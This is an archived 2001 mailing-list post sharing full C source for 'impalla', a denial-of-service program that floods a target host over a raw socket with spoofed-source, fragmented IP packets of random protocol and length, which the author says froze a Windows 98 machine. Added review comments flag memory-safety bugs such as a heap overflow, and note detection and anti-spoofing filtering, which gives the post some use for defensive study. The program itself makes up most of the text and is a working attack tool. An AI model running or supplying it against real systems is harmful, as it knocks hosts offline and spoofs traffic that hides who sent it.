Windows DoS testing

From: Auriemma Luigi (kaino3at_private)
Date: Fri Apr 13 2001 - 03:08:59 PDT


    Author: Auriemma Luigi <kaino3at_private>
    
    Some months ago I modified (very, very casually, to learn a bit of C)
    a program that sends fragmented IGMP type 8 packets to a Windows host; my
    DoS program now sends packets of random type, from random sources. I have
    tried the DoS program only on a Win98SE machine, and it froze for the whole
    duration of the DoS.
    I am now posting the source code to get comments, suggestions and
    reports from you, and I hope that someone will want to test it on other
    machines and systems.
    
    
    Thanks.
    
    
    --- IMPALLA.C ---
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <time.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <netinet/in_systm.h>
    #include <netinet/ip.h>
    #include <sys/socket.h>
    
    /*
     * Four-byte header that main() places directly after the IP header in the
     * packet buffer: a type byte, a code byte and a 16-bit checksum field.
     * This file only ever stores 0 in all three fields.
     */
    struct pack {
            unsigned char  pack_type;   /* message type */
            unsigned char  pack_code;   /* message code */
            unsigned short pack_cksum;  /* checksum field, never computed here */
    };
    /* Print "ERROR: <a>" on stdout, then end the process with exit(-1). */
    #define ERROR(a) do { printf("ERROR: %s\n", (a)); exit(-1); } while (0)
    /* Forward declaration: resolve() is defined after main(). */
    u_long resolve(char *host);
    /*
     * Entry point of the posted DoS test program. Takes exactly one argument
     * (the target host), builds a 1500-byte buffer holding an IP header, a
     * struct pack and filler bytes, and then sends that buffer to the host
     * over a raw socket in an endless loop, overwriting several header fields
     * with rand() output on every iteration. The loop has no exit condition,
     * so the function never returns; the process ends only through
     * ERROR()/resolve() on a setup failure or when it is killed.
     *
     * NOTE(review): memset is called here although <string.h> is not among
     * the includes listed at the top of the file, so it is implicitly declared.
     */
    int main(int argc, char *argv[])
    {
     int nsock, ctr, f;
     char *pkt, *data;
     struct ip *nip;
     struct pack *npack;
     struct sockaddr_in s_addr_in;
     /* Make stdout unbuffered. */
     setvbuf(stdout, NULL, _IONBF, 0);
     if(argc != 2)
      ERROR("usage: impalla <host>");
     /*
      * Raw IP socket: the code below writes the IP header into pkt itself.
      * Opening a raw socket normally requires elevated privileges.
      */
     if((nsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
      ERROR("could not create raw socket");
     pkt = malloc(1500);
     if(!pkt)
      ERROR("could not allocate memory");
     memset(&s_addr_in, 0, sizeof(s_addr_in));
     memset(pkt, 0, 1500);
     /* Three views into the same buffer: IP header, struct pack, payload. */
     nip = (struct ip *) pkt;
     npack = (struct pack *) (pkt + sizeof(struct ip));
     data = (char *)(pkt + sizeof(struct ip) + sizeof(struct pack));
     /*
      * NOTE(review): ctr and f are declared above but never assigned, so the
      * fill byte ctr*f is an indeterminate value (undefined behaviour). The
      * length is the space left in the buffer after the two headers.
      */
     memset(data, ctr*f, 1500-(sizeof(struct ip) + sizeof(struct pack)));
     s_addr_in.sin_addr.s_addr = resolve(argv[1]);
     /* Fixed header fields: IPv4, 5-word (20-byte) header, TOS 0x8, TTL 255. */
     nip->ip_v  = 4;
     nip->ip_hl  = 5;
     nip->ip_tos  = 0x8;
     nip->ip_ttl  = 255;
     nip->ip_sum  = 0;
     /* Source starts out equal to the destination; the loop overwrites it. */
     nip->ip_dst.s_addr = s_addr_in.sin_addr.s_addr;
     nip->ip_src.s_addr = s_addr_in.sin_addr.s_addr;
     /* Already zero from the memset(pkt, 0, 1500) above. */
     npack->pack_cksum = 0;
     npack->pack_type = 0;
     npack->pack_code = 0;
    /*
     * Send loop. The header built here has TOS 0x08, TTL 255, the More
     * Fragments flag with fragment offset 0, and a protocol number, IP ID,
     * length and source address taken from rand() per packet. That
     * combination toward one destination is what a capture filter or
     * detection rule would key on. The random sources are spoofed, so
     * source-address validation (BCP 38) on the sending network is the
     * control that keeps such packets from leaving it.
     */
    while (1)
    {
     /*
      * NOTE(review): data points sizeof(struct ip) + sizeof(struct pack)
      * bytes into a 1500-byte allocation, so writing 4000 bytes runs past
      * the end of the heap buffer: a memory-safety defect in this program.
      */
     memset(data, rand(), 4000);
     /*
      * rand() is never seeded (no srand() call in this file), so the value
      * sequence is the same on every run. ip_p is an 8-bit field and
      * ip_id/ip_len are 16-bit fields, so only the low bits are kept.
      */
     nip->ip_src.s_addr = rand();
     nip->ip_p = rand();
     nip->ip_id = rand();
     nip->ip_len  = rand();
     /* More Fragments set, fragment offset zero. */
     nip->ip_off  = htons(IP_MF);
     /* Always sends the full 1500-byte buffer; the return value is ignored. */
     sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
    sizeof(s_addr_in));
    }
    }
    /*
     * Resolve `host` with gethostbyname() and return its first address as a
     * u_long. On lookup failure it prints the resolver error with herror()
     * and ends the process with exit(-1); no error is ever returned to the
     * caller.
     *
     * NOTE(review): gethostbyname() is an obsolete interface; getaddrinfo()
     * is the current replacement.
     */
    u_long resolve(char *host)
    {
            struct hostent *he;
            u_long ret;
            if(!(he = gethostbyname(host)))
            {
                    herror("gethostbyname()");
                    exit(-1);
            }
            /*
             * NOTE(review): sizeof(he->h_addr) is the size of a pointer, not of
             * the address it points to; the address length is in he->h_length.
             * Where a pointer is wider than the returned address, this copy
             * reads bytes from beyond the address. ret has no initial value,
             * so any of its bytes the copy does not write are indeterminate.
             */
            memcpy(&ret, he->h_addr, sizeof(he->h_addr));
            return ret;
    }
    
    --- END ---
    


